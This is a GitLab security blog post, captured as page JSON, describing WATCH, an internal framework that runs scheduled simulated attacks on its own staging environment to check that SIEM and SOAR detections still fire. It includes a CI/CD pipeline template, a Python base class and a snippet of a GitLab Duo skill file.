[{"data":1,"prerenderedAt":829},["ShallowReactive",2],{"/en-us/blog/automated-detection-testing-framework":3,"navigation-en-us":39,"banner-en-us":460,"footer-en-us":470,"blog-post-authors-en-us-Evan Baltman":712,"blog-related-posts-en-us-automated-detection-testing-framework":727,"blog-promotions-en-us":767,"next-steps-en-us":819},{"id":4,"title":5,"authorSlugs":6,"authors":8,"body":10,"category":11,"categorySlug":11,"config":12,"content":16,"date":20,"description":17,"extension":25,"externalUrl":26,"featured":13,"heroImage":19,"isFeatured":13,"meta":27,"navigation":13,"path":28,"publishedDate":20,"rawbody":29,"seo":30,"slug":15,"stem":34,"tagSlugs":35,"tags":37,"template":14,"updatedDate":26,"__hash__":38},"blogPosts/en-us/blog/automated-detection-testing-framework.yml","Build an automated detection testing framework with GitLab CI/CD and Duo",[7],"evan-baltman",[9],"Evan Baltman","When it comes to managing a healthy alerting system for your security operations center (SOC), tuning false positives is only half the battle. An often overlooked aspect of a healthy alerting system is making sure that critical detections which rarely fire haven’t simply broken completely without anybody noticing.\n\nAt GitLab, the Signals Engineering team tests detections by simulating real malicious behavior on infrastructure we own to validate that our detections fire end-to-end — from the log source, through ingestion, into the SIEM, and all the way through our security orchestration, automation, and response (SOAR) alert routing. This is the approach taken by commercial Breach and Attack Simulation (BAS) tools, but those tools are expensive, generic, and not tailored to our specific detection stack. So we built our own fully automated framework we named Weekly Attack Testing for Continuous Health, or WATCH.\n\nIn this article, you'll learn why we developed this framework, how it works, and how to use it in your environment. 
\n\n## A gap in detection validation\n\nBetween log schema changes, SIEM updates, pipeline misconfigurations, and more, there are a million ways for your detections to fail silently and only one way for them to fire as expected. When faced with these odds, the conclusion is obvious: “Let’s trigger some old detections!” This raises the next questions, however: “How exactly does one trigger detections?” and “How often?”\n\nOne way to trigger detections is the synthetic approach of reintroducing logs into your SIEM that simulate malicious behavior. Then, you wait to see if your detection rule catches the fake issue and triggers an alert. This approach, aside from failing to prove the detection works in a “real world” scenario, doesn’t validate one of the most error-prone stages of the alert lifecycle: log ingestion (i.e., from log source to SIEM).\n\nWe previously wrote about how our [GitLab Universal Automated Response and Detection (GUARD) system](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) automates detection creation and deployment through a detections as code (DaC) pipeline and how alerts are routed and triaged through our SOAR. Our DaC pipelines solve the problem of validating that a detection *can deploy* without errors, but they don't answer the question of whether that detection will actually *fire* when the behavior it targets occurs in the wild.\n\nWATCH closes that gap. It's the continuous validation layer that gives us confidence that our detections are working.\n\n## How WATCH works\n\nAt a high level, WATCH works by executing scripted attack simulations in our staging environment and then verifying that the expected alerts propagate through our entire security monitoring stack: our SIEM for detection rules, our SOAR for alert routing, and ultimately the dashboards our team uses to monitor detection health.\n\nThe lifecycle of a WATCH test looks like this:\n\n1. 
**Scheduling**: Every week, a scheduled GitLab CI/CD pipeline discovers all active tests and distributes them into randomized time slots across the week. Randomization is important; we don't want tests firing at predictable times, which would make it too easy to distinguish test activity from real threats and could mask timing-sensitive issues with our detections.  \n2. **Heads-up notification**: Before a test runs, WATCH notifies our SOAR via a dedicated \"WATCH Heads Up\" story, registering the detections it expects to trigger. This creates trackable records so our SOAR knows what's coming.  \n3. **Execution**: The test runs its simulated malicious behavior. For example, it resets an admin account password or makes suspicious API calls against the staging environment.  \n4. **Detection**: The SIEM processes the activity logs from staging and (hopefully) fires the corresponding detection rules.  \n5. **Correlation**: As alerts arrive in our SOAR, an \"Is this a WATCH Test?\" check determines whether each alert corresponds to a registered test by matching on three factors: the time window between the test run and the alert, the actor identity (IP or username), and the rule ID of the detection that fired. This is what prevents WATCH-generated alerts from being escalated as real incidents to SIRT, while still validating the full pipeline.  \n6. **Verification**: A follow-up pipeline stage checks whether all expected detections fired, updates the detection status metadata, and deploys updated results to our GitLab Pages dashboard. If any detection fails to fire, a notification is sent to our team's Slack channel.\n\n## Using WATCH with GitLab CI/CD\n\nWATCH leverages GitLab CI/CD as its orchestration backbone across three pipeline stages.\n\nThe **schedule_pipelines** stage runs weekly and handles test distribution. It discovers all active tests, bins them into groups, and creates scheduled pipelines set to run at random times throughout the week. 
Each scheduled pipeline is given a `TESTS_TO_RUN` variable specifying which tests it should execute.\n\nThe **run_tests** stage is where the actual attack simulation happens. It executes the tests assigned to that pipeline run, saves execution statistics to `detection_status.json`, and records SOAR record IDs so alert correlation can happen downstream.\n\nThe **pages** stage handles verification and reporting. It queries our SOAR to confirm that alerts were generated and properly routed, updates detection metadata with the verification results, and deploys the GitLab Pages dashboard with the latest test outcomes.\n\nBelow is a template GitLab CI/CD `.gitlab-ci.yml` configuration file for the WATCH pipeline:\n\n```yaml\nspec:\n  inputs:\n    weekly_scheduling:\n      type: boolean\n      default: false\n      description: \"Enable weekly scheduling of detection tests.\"\n    update_pages:\n      type: boolean\n      default: false\n      description: \"For triggering the update of GitLab Pages dashboard.\"\n\n---\n\n# Specify the Docker image to use for the job\nimage: python:3.12\n\nstages:\n  - schedule_pipelines\n  - run_tests\n  - pages\n\n# Job to manage scheduled pipelines (runs when weekly_scheduling input is true)\nmanage_scheduled_pipelines:\n  stage: schedule_pipelines\n  script:\n    - pip install -r requirements.txt\n    - python scripts/manage_scheduled_pipelines.py\n  rules:\n    - if: $TESTS_TO_RUN == null && $CI_PIPELINE_SOURCE == \"schedule\" && $[[ inputs.weekly_scheduling ]] == true\n      when: on_success\n    - when: never\n\n# Job to run detection tests, save tines_record_id to detection_status.json, and commit\nrun_detection_tests:\n  stage: run_tests\n  script:\n    - pip install -r requirements.txt\n    - python main.py --prod --save-stats --scheduled-tests\n  rules:\n    - if: $TESTS_TO_RUN\n      when: on_success\n    - when: never\n\n# Job to verify alerts, update detection_status.json, commit, and deploy pages\npages:\n  stage: pages\n  
script:\n    - pip install -r requirements.txt\n    - python scripts/verify_and_update_detections.py --tines-api-key ${TINES_API_KEY}\n    - mkdir -p public/data\n    - cp detection_status.json public/data/\n    - cp -r static/* public/\n  pages: true  # Required for GitLab 17.9+ to trigger Pages deployment\n  artifacts:\n    paths:\n      - public\n  rules:\n    - if: $TESTS_TO_RUN == null && $[[ inputs.update_pages ]] == true\n      when: on_success\n    - when: never\n```\n\n## How we write tests with GitLab Duo\n\nOne of the design priorities for WATCH was making it easy for anyone on the Signals Engineering or SIRT team to add new tests. The framework provides a `BaseSecurityTest` abstract class that handles all the boilerplate tasks (test ID generation, actor identity management, SOAR coordination) so that test authors only need to focus on three things: setting up the test environment, executing the simulated malicious behavior, and cleaning up afterward.\n\n```py\nimport uuid\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Dict, Optional\n\n\nclass BaseSecurityTest(ABC):\n\n    def __init__(self, config: Optional[Dict[str, Any]] = None, test_id: Optional[str] = None):\n        # Default to None so instances never share one mutable dict\n        config = config or {}\n        self.test_id = test_id or str(uuid.uuid4())\n        self.test_name = self.__class__.__name__\n        self.expected_detections = {}\n        self.actor_id = config.get('gitlab', {}).get(\n            'default_actor_id',\n            \"sirt_detection_test_user_\" + self.test_id[:8]\n        )\n        self.isActive = True\n        self.test_run_time = 300\n        self.config = config\n\n    @abstractmethod\n    def setup(self) -> bool:\n        \"\"\"Prepare test environment and resources\"\"\"\n\n    @abstractmethod\n    def execute(self) -> Dict[str, Any]:\n        \"\"\"Execute the malicious behavior simulation\"\"\"\n\n    @abstractmethod\n    def cleanup(self) -> bool:\n        \"\"\"Clean up test environment and resources\"\"\"\n```\n\nThe key configuration is the `expected_detections` dictionary, which maps SIEM rule names of the detections we expect to trigger to the actor 
identity and expected alert arrival time. A new test is just a Python file in the `tests/` directory that subclasses `BaseSecurityTest`, defines its simulated behavior, and declares which detections it expects to trigger. The test runner automatically discovers it on the next scheduled run.\n\nThis low-friction interface matters because detection testing only works as a practice if the team actually writes tests. If adding a test requires understanding the full pipeline internals, nobody will do it. The simple contract (implement `setup`, `execute`, and `cleanup`, and declare your expected detections) also makes WATCH tests a great candidate for [GitLab Duo](https://about.gitlab.com/gitlab-duo/), GitLab's AI assistant. Give Duo the base class and a prompt like “Make me a test that clones lots of projects from a target group,” “Make me a test that accesses all the CI variables in this project using GraphQL,” or even “Rename all these projects to use the same naming scheme.” Duo can then scaffold a working WATCH test that plugs directly into the framework. This lowers the barrier even further: An engineer can go from \"I want to test this detection\" to a running test with Duo doing most of the implementation work.\n\nPro Tip: To make GitLab Duo even more effective, I used [Duo Agent Skills](https://docs.gitlab.com/user/duo_agent_platform/customize/agent_skills/), which is perfect for defining standards and procedures for routine work like writing tests. In our project directory there is a folder called `skills/WATCH-test-creator` with a `SKILL.md` file outlining what a good test looks like, helper functions the test can use, and what the project is for. This file is read immediately after a prompt like the ones above is entered, so you no longer have to constantly remind Duo what you’re doing and how to do it. Most importantly, it makes the results more consistent and higher quality! 
Here is a snippet of that file:\n\n````text\n---\nname: WATCH-test-creator\ndescription: Create WATCH (Orchestrated Offensive Penetration Simulator) security detection tests that simulate malicious behavior on GitLab infrastructure to validate SIEM detection rules and alerting pipelines.\n---\n\n## WATCH Test Creator\n\nYou are an expert at writing security detection tests for the WATCH framework. WATCH tests simulate malicious activities on GitLab-owned infrastructure to verify that the SecOps security monitoring stack (Elastic SIEM, Tines SOAR, alerting rules) properly detects and responds to threats.\n\n### Architecture Overview\n```\nProject Root\n├── core/\n│   ├── base_test.py          # Abstract base class all tests inherit from\n│   ├── test_runner.py         # Auto-discovers and executes tests\n│   └── webhook_manager.py     # Tines/SOAR notification integration\n├── tests/\n│   ├── gitlab/                # GitLab-specific detection tests\n│   └── gcp/                   # GCP-specific detection tests\n├── utils/\n│   ├── gitlab_helper.py       # GitLab API wrapper (users, projects, tokens, webhooks, OAuth)\n│   └── crypto_utils.py        # Password generation utility\n├── config/\n│   ├── settings.py            # Config loader (reads YAML + GITLAB_ADMIN_PAT env var)\n│   └── environments/\n│       ├── dev.yaml           # Local GDK config\n│       └── prod.yaml          # Production staging.gitlab.com config\n├── main.py                    # Entry point with CLI args\n└── detection_status.json      # Test results and detection metadata\n```\n\n````\n\n## Improved visibility through test dashboards\n\n![Test dashboards](https://res.cloudinary.com/about-gitlab-com/image/upload/v1777574679/ylrc96iip682sinfg7zi.png)\n\nWATCH also deploys two interactive dashboards via [GitLab Pages](https://docs.gitlab.com/user/project/pages/) that give the team real-time visibility into detection health.\n\n* The **Detection Status Dashboard** provides an overview of all 
detection rules and their current test status, including metrics like how many times each detection has fired, its current pass/fail state, and how long the detection has been active. The table is filterable and sortable, so engineers can quickly identify which detections need attention.  \n* The **Test Runs Dashboard** offers a detailed view of individual test executions, grouped by test ID with detection coverage breakdowns. It includes a timeline visualization showing alert propagation times to help us see how long it took from test execution to alert arrival and direct links to the corresponding alerts in our SIEM.\n\nThese dashboards replaced what was previously a manual process of digging through pipeline logs and SIEM queries to understand whether our detections were healthy.\n\nLike the rest of GUARD, WATCH leans heavily on GitLab as its platform:\n\n* **GitLab CI/CD Pipelines and Scheduled Pipelines** orchestrate the entire test lifecycle from weekly scheduling through execution and dashboard deployment.  \n* **Pipeline inputs** allow stages to be triggered independently, so we can re-run just the verification step or just the dashboard update without re-executing all tests.  \n* **CI/CD Variables** securely store the API keys needed for Tines and GitLab staging access.  \n* **GitLab Pages** hosts the WATCH dashboards with zero additional infrastructure, which means no separate hosting to manage, no extra deployment tooling.  \n* Because tests are just Python files in a GitLab project, they benefit from **version control, merge request reviews, and code ownership** the same way our detection rules do through DaC.\n\n## WATCH helps us stay proactive\n\nBuilding WATCH has shifted our team's relationship with detection quality from reactive to proactive. Before WATCH, a broken detection would only surface when an incident occurred and the expected alert was missing; that’s the worst possible time to discover a gap. 
Now, we get regular updates on the health of our detections and know when they break *before* something actually comes up. This gives peace of mind knowing that as we develop new detections, they won’t be broken and then forgotten.\n\nAnother benefit of WATCH is recording tactics, techniques, and procedures (TTPs) that were used by our red team in performing flash operations. Once we’ve implemented detections and conducted the retroactive analysis of a pentest operation, WATCH can be used to replay the TTPs used to validate these detections. In essence, WATCH makes detection atomic tests replayable TTPs.\n\n## Try WATCH\n\nIf you're running a SOC and relying on SIEM detections to catch threats, the question isn't whether your detections will break, it's whether you'll know when they do. You don't need a commercial BAS platform to start answering that question. A sandbox environment, a CI/CD pipeline, and a framework for scripting attack simulations can get you a long way.\n\nYou can try building your own detection testing framework by signing up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/).","security-labs",{"featured":13,"template":14,"slug":15},true,"BlogPost","automated-detection-testing-framework",{"title":5,"description":17,"authors":18,"heroImage":19,"date":20,"body":10,"category":11,"tags":21},"Learn how GitLab's Signals Engineering team built the WATCH framework to continuously validate our security monitoring pipeline.",[9],"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","2026-04-30",[22,23,24],"security","security research","features","yml",null,{},"/en-us/blog/automated-detection-testing-framework","seo:\n  config:\n    noIndex: false\n  title: Automate detection testing with GitLab CI/CD and Duo\n  description: Learn how GitLab's Signals Engineering team built the WATCH\n    framework to continuously validate our security monitoring pipeline.\ncontent:\n  title: Build an 
automated detection testing framework with GitLab CI/CD and Duo\n  description: Learn how GitLab's Signals Engineering team built the WATCH\n    framework to continuously validate our security monitoring pipeline.\n  authors:\n    - Evan Baltman\n  heroImage: https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png\n  date: 2026-04-30\n  body: >-\n    When it comes to managing a healthy alerting system for your security\n    operations center (SOC), tuning false positives is only half the battle. An\n    often overlooked aspect of a healthy alerting system is making sure that\n    critical detections which rarely fire haven’t simply broken completely\n    without anybody noticing.\n\n\n    At GitLab, the Signals Engineering team tests detections by simulating real malicious behavior on infrastructure we own to validate that our detections fire end-to-end — from the log source, through ingestion, into the SIEM, and all the way through our security orchestration, automation, and response (SOAR) alert routing. This is the approach taken by commercial Breach and Attack Simulation (BAS) tools, but those tools are expensive, generic, and not tailored to our specific detection stack. So we built our own fully automated framework we named Weekly Attack Testing for Continuous Health, or WATCH.\n\n\n    In this article, you'll learn why we developed this framework, how it works, and how to use it in your environment. \n\n\n    ##  A gap in detection validation\n\n\n    With log schema changes, SIEM updates, pipeline misconfigurations, etc. there are a million ways for your detections to fail silently and only one way for them to fire as expected. 
When faced with these odds, the conclusion is obvious: “Let’s trigger some old detections!” This raises the next questions, however: “How exactly does one trigger detections?” and “How often?”\n\n\n    One way to trigger detections is the synthetic approach of reintroducing logs into your SIEM that simulate malicious behavior. Then, you wait to see if your detection rule catches the fake issue and triggers an alert. This approach, aside from failing to prove the detection works in a “real world” scenario, doesn’t validate one of the most error-prone stages of the alert lifecycle: log ingestion (i.e., from log source to SIEM).\n\n\n    We previously wrote about how our [GitLab Universal Automated Response and Detection (GUARD) system](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/) automates detection creation and deployment through a detections as code (DaC) pipeline and how alerts are routed and triaged through our SOAR. Our DaC pipelines solve the problem of validating that a detection *can deploy* without errors, but they don't answer the question of whether that detection will actually *fire* when the behavior it targets occurs in the wild.\n\n\n    WATCH closes that gap. It's the continuous validation layer that gives us confidence that our detections are working.\n\n\n    ## How WATCH works\n\n\n    At a high level, WATCH works by executing scripted attack simulations in our staging environment and then verifying that the expected alerts propagate through our entire security monitoring stack: our SIEM for detection rules, our SOAR for alert routing, and ultimately the dashboards our team uses to monitor detection health.\n\n\n    The lifecycle of a WATCH test looks like this:\n\n\n    1. **Scheduling**: Every week, a scheduled GitLab CI/CD pipeline discovers all active tests and distributes them into randomized time slots across the week. 
Randomization is important; we don't want tests firing at predictable times, which would make it too easy to distinguish test activity from real threats and could mask timing-sensitive issues with our detections.  \n\n    2. **Heads-up notification**: Before a test runs, WATCH notifies our SOAR via a dedicated \"WATCH Heads Up\" story, registering the detections it expects to trigger. This creates trackable records so our SOAR knows what's coming.  \n\n    3. **Execution**: The test runs its simulated malicious behavior. For example, it resets an admin account password or makes suspicious API calls against the staging environment.  \n\n    4. **Detection**: The SIEM processes the activity logs from staging and (hopefully) fires the corresponding detection rules.  \n\n    5. **Correlation**: As alerts arrive in our SOAR, an \"Is this a WATCH Test?\" check determines whether each alert corresponds to a registered test by matching on three factors: the time window between the test run and the alert, the actor identity (IP or username), and the rule ID of the detection that fired. This is what prevents WATCH-generated alerts from being escalated as real incidents to SIRT, while still validating the full pipeline.  \n\n    6. **Verification**: A follow-up pipeline stage checks whether all expected detections fired, updates the detection status metadata, and deploys updated results to our GitLab Pages dashboard. If any detection fails to fire, a notification is sent to our team's Slack channel.\n\n\n    ## Using WATCH with GitLab CI/CD\n\n\n    WATCH leverages GitLab CI/CD as its orchestration backbone across three pipeline stages.\n\n\n    The **schedule_pipelines** stage runs weekly and handles test distribution. It discovers all active tests, bins them into groups, and creates scheduled pipelines set to run at random times throughout the week. 
Each scheduled pipeline is given a `TESTS_TO_RUN` variable specifying which tests it should execute.\n\n\n    The **run_tests** stage is where the actual attack simulation happens. It executes the tests assigned to that pipeline run, saves execution statistics to `detection_status.json`, and records SOAR record IDs so alert correlation can happen downstream.\n\n\n    The **pages** stage handles verification and reporting. It queries our SOAR to confirm that alerts were generated and properly routed, updates detection metadata with the verification results, and deploys the GitLab Pages dashboard with the latest test outcomes.\n\n\n    Below is a template GitLab CI/CD `.gitlab-ci.yml` configuration file for the WATCH pipeline:\n\n\n    ```yaml\n\n    spec:\n      inputs:\n        weekly_scheduling:\n          type: boolean\n          default: false\n          description: \"Enable weekly scheduling of detection tests.\"\n        update_pages:\n          type: boolean\n          default: false\n          description: \"For triggering the update of GitLab Pages dashboard.\"\n\n    ---\n\n\n    # Specify the Docker image to use for the job\n\n    image: python:3.12\n\n\n    stages:\n      - schedule_pipelines\n      - run_tests\n      - pages\n\n    # Job to manage scheduled pipelines (runs when weekly_scheduling input is true)\n\n    manage_scheduled_pipelines:\n      stage: schedule_pipelines\n      script:\n        - pip install -r requirements.txt\n        - python scripts/manage_scheduled_pipelines.py\n      rules:\n        - if: $TESTS_TO_RUN == null && $CI_PIPELINE_SOURCE == \"schedule\" && $[[ inputs.weekly_scheduling ]] == true\n          when: on_success\n        - when: never\n\n    # Job to run detection tests, save tines_record_id to detection_status.json, and commit\n\n    run_detection_tests:\n      stage: run_tests\n      script:\n        - pip install -r requirements.txt\n        - python main.py --prod --save-stats --scheduled-tests\n      rules:\n        - 
if: $TESTS_TO_RUN\n          when: on_success\n        - when: never\n\n    # Job to verify alerts, update detection_status.json, commit, and deploy pages\n\n    pages:\n      stage: pages\n      script:\n        - pip install -r requirements.txt\n        - python scripts/verify_and_update_detections.py --tines-api-key ${TINES_API_KEY}\n        - mkdir -p public/data\n        - cp detection_status.json public/data/\n        - cp -r static/* public/\n      pages: true  # Required for GitLab 17.9+ to trigger Pages deployment\n      artifacts:\n        paths:\n          - public\n      rules:\n        - if: $TESTS_TO_RUN == null && $[[ inputs.update_pages ]] == true\n          when: on_success\n        - when: never\n    ```\n\n\n    ## How we write tests with GitLab Duo\n\n\n    One of the design priorities for WATCH was making it easy for anyone on the Signals Engineering or SIRT team to add new tests. The framework provides a `BaseSecurityTest` abstract class that handles all the boilerplate tasks (test ID generation, actor identity management, SOAR coordination) so that test authors only need to focus on three things: setting up the test environment, executing the simulated malicious behavior, and cleaning up afterward.\n\n\n    ```py\n\n    import uuid\n    from abc import ABC, abstractmethod\n    from typing import Any, Dict, Optional\n\n\n    class BaseSecurityTest(ABC):\n\n        def __init__(self, config: Optional[Dict[str, Any]] = None, test_id: Optional[str] = None):\n            # Default to None so instances never share one mutable dict\n            config = config or {}\n            self.test_id = test_id or str(uuid.uuid4())\n            self.test_name = self.__class__.__name__\n            self.expected_detections = {}\n            self.actor_id = config.get('gitlab', {}).get(\n                'default_actor_id',\n                \"sirt_detection_test_user_\" + self.test_id[:8]\n            )\n            self.isActive = True\n            self.test_run_time = 300\n            self.config = config\n\n        @abstractmethod\n        def setup(self) -> bool:\n            \"\"\"Prepare test environment and resources\"\"\"\n\n        @abstractmethod\n        def execute(self) -> Dict[str, 
Any]:\n            \"\"\"Execute the malicious behavior simulation\"\"\"\n\n        @abstractmethod\n        def cleanup(self) -> bool:\n            \"\"\"Clean up test environment and resources\"\"\"\n    ```\n\n\n    The key configuration is the `expected_detections` dictionary, which maps SIEM rule names of the detections we expect to trigger to the actor identity and expected alert arrival time. A new test is just a Python file in the `tests/` directory that subclasses `BaseSecurityTest`, defines its simulated behavior, and declares which detections it expects to trigger. The test runner automatically discovers it on the next scheduled run.\n\n\n    This low-friction interface matters because detection testing only works as a practice if the team actually writes tests. If adding a test requires understanding the full pipeline internals, nobody will do it. The simple contract (implement `setup`, `execute`, and `cleanup`, and declare your expected detections) also makes WATCH tests a great candidate for [GitLab Duo](https://about.gitlab.com/gitlab-duo/), GitLab's AI assistant. Give Duo the base class and a prompt like “Make me a test that clones lots of projects from a target group,” “Make me a test that accesses all the CI variables in this project using GraphQL,” or even “Rename all these projects to use the same naming scheme.” Duo can then scaffold a working WATCH test that plugs directly into the framework. This lowers the barrier even further: An engineer can go from \"I want to test this detection\" to a running test with Duo doing most of the implementation work.\n\n\n    Pro Tip: To make GitLab Duo even more effective, I used [Duo Agent Skills](https://docs.gitlab.com/user/duo_agent_platform/customize/agent_skills/), which is perfect for defining standards and procedures for routine work like writing tests. 
In our project directory there is a folder called `skills/WATCH-test-creator` with a SKILL.md outlining what a good test looks like, helper functions the test can use, and what the project is for. This file is read immediately after a prompt like the ones above are entered, which makes having to constantly remind Duo what it is you’re doing and how to do it no longer necessary. Most importantly, it makes the results consistent and higher quality! Here is a snippet of that file:\n\n\n    ````text\n\n    ---\n\n    name: WATCH-test-creator\n\n    description: Create WATCH (Orchestrated Offensive Penetration Simulator) security detection tests that simulate malicious behavior on GitLab infrastructure to validate SIEM detection rules and alerting pipelines.\n\n    ---\n\n\n    ## WATCH Test Creator\n\n\n    You are an expert at writing security detection tests for the WATCH framework. WATCH tests simulate malicious activities on GitLab-owned infrastructure to verify that the SecOps security monitoring stack (Elastic SIEM, Tines SOAR, alerting rules) properly detects and responds to threats.\n\n\n    ### Architecture Overview\n\n    ```\n\n    Project Root\n\n    ├── core/\n\n    │   ├── base_test.py          # Abstract base class all tests inherit from\n\n    │   ├── test_runner.py         # Auto-discovers and executes tests\n\n    │   └── webhook_manager.py     # Tines/SOAR notification integration\n\n    ├── tests/\n\n    │   ├── gitlab/                # GitLab-specific detection tests\n\n    │   └── gcp/                   # GCP-specific detection tests\n\n    ├── utils/\n\n    │   ├── gitlab_helper.py       # GitLab API wrapper (users, projects, tokens, webhooks, OAuth)\n\n    │   └── crypto_utils.py        # Password generation utility\n\n    ├── config/\n\n    │   ├── settings.py            # Config loader (reads YAML + GITLAB_ADMIN_PAT env var)\n\n    │   └── environments/\n\n    │       ├── dev.yaml           # Local GDK config\n\n    │       └── prod.yaml       
   # Production staging.gitlab.com config\n\n    ├── main.py                    # Entry point with CLI args\n\n    └── detection_status.json      # Test results and detection metadata\n\n    ```\n\n\n    ````\n\n\n    ## Improved visibility through test dashboards\n\n\n    ![Test dashboards](https://res.cloudinary.com/about-gitlab-com/image/upload/v1777574679/ylrc96iip682sinfg7zi.png)\n\n\n    WATCH also deploys two interactive dashboards via [GitLab Pages](https://docs.gitlab.com/user/project/pages/) that give the team real-time visibility into detection health.\n\n\n    * The **Detection Status Dashboard** provides an overview of all detection rules and their current test status, including metrics like how many times each detection has fired, its current pass/fail state, and how long the detection has been active. The table is filterable and sortable, so engineers can quickly identify which detections need attention.  \n\n    * The **Test Runs Dashboard** offers a detailed view of individual test executions, grouped by test ID with detection coverage breakdowns. It includes a timeline visualization showing alert propagation times to help us see how long it took from test execution to alert arrival and direct links to the corresponding alerts in our SIEM.\n\n\n    These dashboards replaced what was previously a manual process of digging through pipeline logs and SIEM queries to understand whether our detections were healthy.\n\n\n    Like the rest of GUARD, WATCH leans heavily on GitLab as its platform:\n\n\n    * **GitLab CI/CD Pipelines and Scheduled Pipelines** orchestrate the entire test lifecycle from weekly scheduling through execution and dashboard deployment.  \n\n    * **Pipeline inputs** allow stages to be triggered independently, so we can re-run just the verification step or just the dashboard update without re-executing all tests.  \n\n    * **CI/CD Variables** securely store the API keys needed for Tines and GitLab staging access.  
\n\n    * **GitLab Pages** hosts the WATCH dashboards with zero additional infrastructure, which means no separate hosting to manage and no extra deployment tooling.  \n\n    * Because tests are just Python files in a GitLab project, they benefit from **version control, merge request reviews, and code ownership** the same way our detection rules do through DaC.\n\n\n    ## WATCH helps us stay proactive\n\n\n    Building WATCH has shifted our team's relationship with detection quality from reactive to proactive. Before WATCH, a broken detection would only surface when an incident occurred and the expected alert was missing; that’s the worst possible time to discover a gap. Now, we get regular updates on the health of our detections and know when they break *before* a real incident depends on them. This gives us confidence that new detections won’t silently break and be forgotten after they ship.\n\n\n    Another benefit of WATCH is recording the tactics, techniques, and procedures (TTPs) that our red team used in flash operations. Once we’ve implemented detections and completed the retroactive analysis of a pentest operation, WATCH can replay those TTPs to validate the new detections. In essence, WATCH turns red team TTPs into replayable, atomic detection tests.\n\n\n    ## Try WATCH\n\n\n    If you're running a SOC and relying on SIEM detections to catch threats, the question isn't whether your detections will break; it's whether you'll know when they do. You don't need a commercial BAS platform to start answering that question. 
A sandbox environment, a CI/CD pipeline, and a framework for scripting attack simulations can get you a long way.\n\n\n    You can try building your own detection testing framework by signing up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/).\n  category: security-labs\n  tags:\n    - security\n    - security research\n    - features\nconfig:\n  featured: true\n  template: BlogPost\n  slug: automated-detection-testing-framework\n",{"config":31,"title":33,"description":17},{"noIndex":32},false,"Automate detection testing with GitLab CI/CD and Duo","en-us/blog/automated-detection-testing-framework",[22,36,24],"security-research",[22,23,24],"UWmElmhGneferKij1y9uz2hzE7yv1Xj3kyPA6edciRw",{"logo":40,"freeTrial":45,"sales":50,"login":55,"items":60,"search":380,"minimal":411,"duo":430,"switchNav":439,"pricingDeployment":450},{"config":41},{"href":42,"dataGaName":43,"dataGaLocation":44},"/","gitlab logo","header",{"text":46,"config":47},"Get free trial",{"href":48,"dataGaName":49,"dataGaLocation":44},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":51,"config":52},"Talk to sales",{"href":53,"dataGaName":54,"dataGaLocation":44},"/sales/","sales",{"text":56,"config":57},"Sign in",{"href":58,"dataGaName":59,"dataGaLocation":44},"https://gitlab.com/users/sign_in/","sign in",[61,90,190,195,299,360],{"text":62,"config":63,"menu":65},"Platform",{"dataNavLevelOne":64},"platform",{"type":66,"columns":67},"cards",[68,74,82],{"title":62,"description":69,"link":70},"The intelligent orchestration platform for DevSecOps",{"text":71,"config":72},"Explore our Platform",{"href":73,"dataGaName":64,"dataGaLocation":44},"/platform/",{"title":75,"description":76,"link":77},"GitLab Duo Agent Platform","Agentic AI for the entire software lifecycle",{"text":78,"config":79},"Meet GitLab Duo",{"href":80,"dataGaName":81,"dataGaLocation":44},"/gitlab-duo-agent-platform/","gitlab duo agent 
platform",{"title":83,"description":84,"link":85},"Why GitLab","See the top reasons enterprises choose GitLab",{"text":86,"config":87},"Learn more",{"href":88,"dataGaName":89,"dataGaLocation":44},"/why-gitlab/","why gitlab",{"text":91,"left":13,"config":92,"menu":94},"Product",{"dataNavLevelOne":93},"solutions",{"type":95,"link":96,"columns":100,"feature":169},"lists",{"text":97,"config":98},"View all Solutions",{"href":99,"dataGaName":93,"dataGaLocation":44},"/solutions/",[101,125,148],{"title":102,"description":103,"link":104,"items":109},"Automation","CI/CD and automation to accelerate deployment",{"config":105},{"icon":106,"href":107,"dataGaName":108,"dataGaLocation":44},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[110,114,117,121],{"text":111,"config":112},"CI/CD",{"href":113,"dataGaLocation":44,"dataGaName":111},"/solutions/continuous-integration/",{"text":75,"config":115},{"href":80,"dataGaLocation":44,"dataGaName":116},"gitlab duo agent platform - product menu",{"text":118,"config":119},"Source Code Management",{"href":120,"dataGaLocation":44,"dataGaName":118},"/solutions/source-code-management/",{"text":122,"config":123},"Automated Software Delivery",{"href":107,"dataGaLocation":44,"dataGaName":124},"Automated software delivery",{"title":126,"description":127,"link":128,"items":133},"Security","Deliver code faster without compromising security",{"config":129},{"href":130,"dataGaName":131,"dataGaLocation":44,"icon":132},"/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[134,138,143],{"text":135,"config":136},"Application Security Testing",{"href":130,"dataGaName":137,"dataGaLocation":44},"Application security testing",{"text":139,"config":140},"Software Supply Chain Security",{"href":141,"dataGaLocation":44,"dataGaName":142},"/solutions/supply-chain/","Software supply chain security",{"text":144,"config":145},"Software 
